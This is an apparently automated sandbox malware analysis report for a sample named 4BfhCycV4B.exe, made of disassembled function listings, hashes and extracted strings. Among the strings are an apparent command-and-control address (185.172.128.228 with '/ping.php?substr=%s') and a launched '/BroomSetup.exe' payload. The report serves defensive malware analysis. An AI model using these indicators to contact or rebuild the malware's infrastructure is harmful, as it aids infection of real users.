                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: fbee67670cac963d705fd7507e9235c6336ecf61fd3dc464c7e48e504d00ea45
                                                                                                                                                                                                                                                                                        • Instruction ID: 4b083a6e31e8a48a8b86c3cb0939e7a8061e9024a6891407e723d3d4127bfca1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbee67670cac963d705fd7507e9235c6336ecf61fd3dc464c7e48e504d00ea45
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09F04F32504310AB8A20EB6AF886E9773D9FA44764355480AFD08D7600CB38FCC0869C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421F105 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F11D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F12F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F141
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F153
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F165
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                                                                        • Instruction ID: 3e0e9be5de0c80a20643d23301bc0ee09cdf0a53b552be22f71de44c6334c85a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF09032730601BB9A30EBA8F9C5E1B73D9FA347A17650805F156D7530CB31F8818AA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 13296f953f5605bad7b8141934ae876b7b1474904382dc56f17c0a076f0bbd1e
                                                                                                                                                                                                                                                                                        • Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13296f953f5605bad7b8141934ae876b7b1474904382dc56f17c0a076f0bbd1e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04215519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04215537
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04215549
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421555C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421556D
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421557E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                                                                        • Instruction ID: 0ed74fec90798dbdcb1ad6687674d8c9e993c045769da7afa7fb6aeba3bb8ba3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39F089B1921110ABDB266F58FCC06093BE1FB24755311717AF509B2278DF3666818FCE
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 0-2895899722
                                                                                                                                                                                                                                                                                        • Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                                                                        • Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041D851 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _strpbrk.LIBCMT ref: 0041D8A0
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041D9BD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
                                                                                                                                                                                                                                                                                          • Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
                                                                                                                                                                                                                                                                                          • Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                                                                        • Opcode ID: d9abd10b7aefc9144c270b2d223c4f4c04a3bd27397295da1f1220bb01056fb9
                                                                                                                                                                                                                                                                                        • Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9abd10b7aefc9144c270b2d223c4f4c04a3bd27397295da1f1220bb01056fb9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421DAB8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _strpbrk.LIBCMT ref: 0421DB07
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421DC24
                                                                                                                                                                                                                                                                                          • Part of subcall function 04210B99: IsProcessorFeaturePresent.KERNEL32(00000017,04210B6B,00000016,04212DA0,0000002C,00439740,0421D634,?,?,?,04210B78,00000000,00000000,00000000,00000000,00000000), ref: 04210B9B
                                                                                                                                                                                                                                                                                          • Part of subcall function 04210B99: GetCurrentProcess.KERNEL32(C0000417,04212DA0,00000016,04217003), ref: 04210BBD
                                                                                                                                                                                                                                                                                          • Part of subcall function 04210B99: TerminateProcess.KERNEL32(00000000), ref: 04210BC4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                                                                        • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                                                                        • Instruction ID: dd3cd51d9b0e2ee9a8d30b1212e86d1304b79bb2aa9a5d13c7f31916ee292e96
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E517C71E2021AEFDB14DFA8C880AADB7F5EF58214F2441A9D855E7350E675BA018B50
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4BfhCycV4B.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                        • API String ID: 2506810119-2706877378
                                                                                                                                                                                                                                                                                        • Opcode ID: 89571fb4a0fa21399e53de1581e60ccbdefbfde7f591af085b1f054b64fc575c
                                                                                                                                                                                                                                                                                        • Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89571fb4a0fa21399e53de1581e60ccbdefbfde7f591af085b1f054b64fc575c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4BfhCycV4B.exe,00000104), ref: 0421356A
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04213635
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421363F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                        • API String ID: 2506810119-2706877378
                                                                                                                                                                                                                                                                                        • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                                                                        • Instruction ID: 19146988c89d1355b5af578d08549e920d934548d5ef2c2ad087858aa49024ce
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2319971B10258FFEB21DF999C8099EBBFDEBA8754F104066F80597220D7706A41CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040356F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                                                                        • Opcode ID: 921861a328e3f7d7c824c3837ef5087e2f64e12fe3abc36e80d027132d948a15
                                                                                                                                                                                                                                                                                        • Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 921861a328e3f7d7c824c3837ef5087e2f64e12fe3abc36e80d027132d948a15
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042037D6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                                                                        • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                                                                        • Instruction ID: d6c9b49f3576894268384e34a7769fea6536198246bed8f030a338df323358a1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D01ADB2B11125ABE705DF98DC40BAEB7B8FF44714F10812AF805E3282D774AA5086A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042264C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 04226509
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 0422651D
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 04226526
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                                                                        • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                                                                        • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                                                                        • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                                                                        • Instruction ID: fcee80554b7bb8f83e96237b758e31ebbb71fac2ff0f3adf96d4edc60fcfcaa5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C501BC31E00228EBDB24DF69E9405DCBFB8FF08710F00812AF805A2160EB70AA45CF90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                                                                        • Instruction ID: 95edb75e536639b33972a857d440f8be94c0c6db010a7eda39038c13656bb89e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FA11372A083869FDB218F18C8817EBBBF1EF55354F1541AEE4859B381C63C8D82C758
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04217FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                                                                        • Instruction ID: 34cdb12fa60afda0999425d0ca7dcaa4a490838225d7c357bc5d1329bccbd471
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63A19B32F207869FEB22EF18C8D07AEBBE4EF61350F14416DD9949B260D639A941C750
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0042299F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d02d317f15c26d2d8a1154963665b7230d013173a083be2dd11090471da98427
                                                                                                                                                                                                                                                                                        • Instruction ID: c8489a2078e21136fa723fa80d13f2eda68097992bc6546b806c704246c56682
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d02d317f15c26d2d8a1154963665b7230d013173a083be2dd11090471da98427
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE414C31B402217BDB306E7A9D41BAF3A64EF45374F54025BF818D6691DAFC8C9182AD
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04222C06 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
